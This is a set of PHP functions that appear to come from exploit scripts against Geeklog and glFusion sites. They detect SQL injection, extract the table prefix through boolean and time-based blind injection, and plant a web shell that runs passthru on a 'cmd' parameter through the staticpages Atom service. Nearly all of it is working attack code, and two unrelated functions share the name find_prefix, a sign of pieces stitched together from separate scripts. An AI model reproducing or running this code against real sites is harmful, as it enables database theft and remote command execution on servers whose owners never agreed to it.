function run_test() { global $host, $port, $path, $cookies, $url, $prefix; $_sql = ")"; $out = _s($url, $cookies, 1, "mode=savepreferences&" . $prefix . "blocks[0]=" . urlencode($_sql) . "&"); if (chk_err($out)) { print "[*] Vulnerable!\n"; } else { die("[!] Not vulnerable ..."); } }
function find_prefix() { global $_lnks, $v, $type, $host, $port, $path, $prepend; $_table_name = ""; $j = 1; print "[*] Table name -> "; while (!strstr($_table_name, chr(0))) { $mn = 0x0; $mx = 0xff; while (1) { if (($mx + $mn) % 2 == 1) { $c = round(($mx + $mn) / 2) - 1; } else { $c = round(($mx + $mn) / 2); } $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) >= " . $c . ") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--"); $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search"; $_d = "order=" . $sql . ";"; $_o = _s($url, $_d); if (chk_err($_o)) { die("\n[!] information_schema not availiable!"); } $l = xtrct_lnk($_o); if ($l == $_lnks[0]) { $mn = $c; } else { $mx = $c - 1; } if ($mx - $mn == 1 or $mx == $mn) { $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) = " . $mn . ") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--"); $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search"; $_d = "order=" . $sql . ";"; $_o = _s($url, $_d); $l = xtrct_lnk($_o); if ($l == $_lnks[0]) { print chr($mn); $_table_name .= chr($mn); } else { print chr($mx); $_table_name .= chr($mx); } break; } } $j++; } print "\n"; $_prefix = str_replace("trackbackcodes", "", $_table_name); return $_prefix; }
function sp_php() { global $host, $port, $path, $pwd, $prefix, $uid; srand(make_seed()); $id = rand(0x1, 0xffffff); echo "[*] id->" . $id . "\n"; $sh = "passthru(\$_GET[cmd]);"; //always specify the namespaceuri //if the staticpages.PHP permission is not avaliable, sp_php will be resetted to 0 $data = "<?xml version=\"1.0\"?>" . "<entry>" . "<title term=\"1\" xmlns=\"http://www.geeklog.net/xmlns/app/gl\"> </title>" . "<id xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$id}</id>" . "<sp_content xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$sh}</sp_content>" . "<sp_php xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>" . "<gl_etag xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>" . "</entry>"; $usr = "******" . $prefix . "users LIMIT 1/*"; $url = "http://{$host}:{$port}" . $path . "webservices/atom/index.php?plugin=staticpages"; $out = _s($url, base64_encode($usr . ":" . $pwd), 1, $data); if (chk_err($_o)) { print "[*] Sql error."; } else { print "[*] Done! Visit->http://{$host}:{$port}" . $path . "staticpages/index.php?page={$id}&cmd=ls%20-la"; } }
function find_prefix() { global $host, $port, $path, $delayfunc, $_user, $_pwd, $n; $_tn = "TABLE_NAME"; //case important ?? $_ift = "information_schema.TABLES"; //?? $_table_prefix = ""; $j = -15; print "[*] Initiating table prefix extraction...\n"; while (!$null_f) { $mn = 0x0; $mx = 0xff; while (1) { if (($mx + $mn) % 2 == 1) { $c = round(($mx + $mn) / 2) - 1; } else { $c = round(($mx + $mn) / 2); } $sessid = login(); $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) >= " . $c . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- "; $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;"; $url = "http://{$host}:{$port}" . $path; $starttime = time(); $_o = _s($url, $cookies, 0, ""); $endtime = time(); $difftime = $endtime - $starttime; if (chk_err($_o)) { die("\n[!] information_schema not availiable! MySQL < 5.0"); } if ($difftime > $n - 1) { $mn = $c; sleep($n); } else { $mx = $c - 1; } if ($mx - $mn == 1 or $mx == $mn) { $sessid = login(); $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) = " . $mn . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- "; $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;"; $url = "http://{$host}:{$port}" . $path; $starttime = time(); $_o = _s($url, $cookies, 0, ""); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $n - 1) { if ($mn != 0) { $_table_prefix = chr($mn) . $_table_prefix; } else { $null_f = true; } } else { $_table_prefix = chr($mx) . $_table_prefix; } if (!$null_f) { print "[?] Table prefix->[??]" . $_table_prefix . "\n"; } sleep($n); break; } } $j--; } print "[?] Table prefix->" . $_table_prefix . "\n"; return $_table_prefix; }